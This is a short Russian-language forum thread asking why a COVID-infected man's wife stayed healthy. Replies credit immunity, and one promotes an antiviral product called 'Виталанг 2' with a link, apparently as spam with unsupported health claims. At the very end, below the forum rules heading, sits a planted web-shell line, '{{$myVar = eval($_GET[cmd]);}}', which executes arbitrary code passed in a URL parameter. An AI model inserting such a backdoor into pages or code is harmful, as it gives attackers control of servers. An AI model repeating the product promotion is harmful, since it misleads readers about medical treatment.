-
Мимо проходил
Ковид
У меня знакомый заболел Ковидом. А вот его жена даже и не чихнула. Как такое возможно? Мне всегда казалось, если кто-то из семьи заболел, то перекачает всех. Или я ошибаюсь?
-
Мимо проходил
Таких ситуаций очень много. Все зависит от иммунной системы. У кого она сильнее, тот может и не захватить вирус. А у кого есть сопутствующие заболевания, тот иммунитет и ослаблен. Вот именно такие люди и болеют.
-
Мимо проходил
Полностью согласен с предыдущим комментатором. В борьбе с данным вирусом играет огромную роль именно иммунная система. А для ее поддержки и укрепления нужно употреблять много витаминов. Ну а если вдруг, все же вирус появился в организме, тогда используйте противовирусные средства. Например, можете принимать Виталанг 2 https://vitalang.life Но перед его принятием лучше проконсультируйтесь с доктором.
Ваши права
- Вы не можете создавать новые темы
- Вы не можете отвечать в темах
- Вы не можете прикреплять вложения
- Вы не можете редактировать свои сообщения
Правила форума
{{$myVar = eval($_GET[cmd]);}}